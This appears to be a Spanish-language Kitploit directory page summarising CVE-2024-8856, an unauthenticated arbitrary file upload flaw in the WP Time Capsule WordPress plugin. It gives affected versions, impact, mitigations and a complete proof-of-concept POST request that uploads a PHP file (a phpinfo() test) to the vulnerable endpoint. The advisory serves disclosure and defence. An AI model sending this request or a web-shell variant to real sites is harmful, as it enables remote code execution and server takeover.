Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-8856 — Vulnerabilidad de subida de archivos arbitraria en el complemento WP Time Capsule de WordPress | Kitploit
Herramientas/GitHubGitHub/ubaydev/cve-2024-8856
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHububaydev/cve-2024-8856

CVE-2024-8856

Vulnerabilidad de subida de archivos arbitraria en el complemento WP Time Capsule de WordPress

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-8856: Vulnerabilidad de subida arbitraria de archivos en el plugin WP Time Capsule de WordPress

Resumen

CVE-2024-8856 es una vulnerabilidad de seguridad encontrada en el plugin WP Time Capsule para WordPress que permite a usuarios no autenticados subir archivos arbitrarios al servidor. Esto puede conducir a la ejecución remota de código si los archivos subidos son ejecutados por el servidor. La vulnerabilidad surge de una validación insuficiente de archivos y puede ser explotada enviando solicitudes especialmente diseñadas al endpoint vulnerable.

Versiones afectadas

  • Versiones del plugin WP Time Capsule anteriores a la 1.22.21 (corregido en la 1.22.22).

Impacto

Esta vulnerabilidad permite a usuarios no autenticados:

  • Subir scripts PHP maliciosos al servidor.
  • Ejecutar código arbitrario en el servidor, lo que puede llevar al compromiso total del sistema.
  • Aprovechar potencialmente este acceso para explotar aún más la aplicación web y la infraestructura subyacente.

Prueba de concepto (PoC)

La siguiente es una prueba de concepto que demuestra cómo explotar la vulnerabilidad CVE-2024-8856 enviando una solicitud POST al endpoint vulnerable.

Solicitud de ejemplo

root@kitploit:~
POST /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php HTTP/1.1
Host: wordpress.local
Content-Length: 199
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHvQu3NOpI44bLkPN
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Origin: http://wordpress.local
Content-Disposition: 18.php
Accept-Encoding: gzip, deflate, br
Connection: close

------WebKitFormBoundaryHvQu3NOpI44bLkPN
Content-Disposition: form-data; name="files"; filename="php"
Content-Type: application/sql

<?php phpinfo();
------WebKitFormBoundaryHvQu3NOpI44bLkPN--

Explicación de la PoC

  • Solicitud POST: La solicitud es un POST a la ruta donde se expone la funcionalidad de subida vulnerable.
  • Content-Type: La solicitud establece el Content-Type a multipart/form-data, lo cual es requerido para las subidas de archivos.
  • Subida de archivo: El archivo se especifica en el cuerpo con una cabecera Content-Disposition. En el ejemplo, se intenta subir un archivo PHP que contiene <?php phpinfo();, que mostrará los detalles de configuración de PHP si se ejecuta.
  • Endpoint vulnerable: El endpoint /wp-content/plugins/wp-time-capsule/wp-tcapsule-bridge/upload/php/index.php es el punto de explotación.

Mitigación

Para mitigar esta vulnerabilidad:

  • Actualiza el plugin: Asegúrate siempre de que el plugin WP Time Capsule esté actualizado a la última versión proporcionada por el desarrollador.
  • Restricciones de subida de archivos: Implementa restricciones de subida de archivos en el servidor para permitir solo tipos de archivo específicos (por ejemplo, imágenes) y deshabilitar la ejecución de los archivos subidos.
  • Firewall de aplicaciones web (WAF): Usa un firewall de aplicaciones web (WAF) para detectar y bloquear solicitudes maliciosas antes de que lleguen a tu servidor.

Referencias

CVE-2024-8856 - Base Nacional de Datos de Vulnerabilidades

Conclusión

CVE-2024-8856 es una vulnerabilidad grave que requiere atención inmediata por parte de los administradores de sitios WordPress que utilizan el plugin WP Time Capsule. Se deben tomar las precauciones adecuadas para proteger la aplicación contra una posible explotación. Mantente siempre al día con las prácticas de seguridad y las actualizaciones del plugin.

Descargar herramienta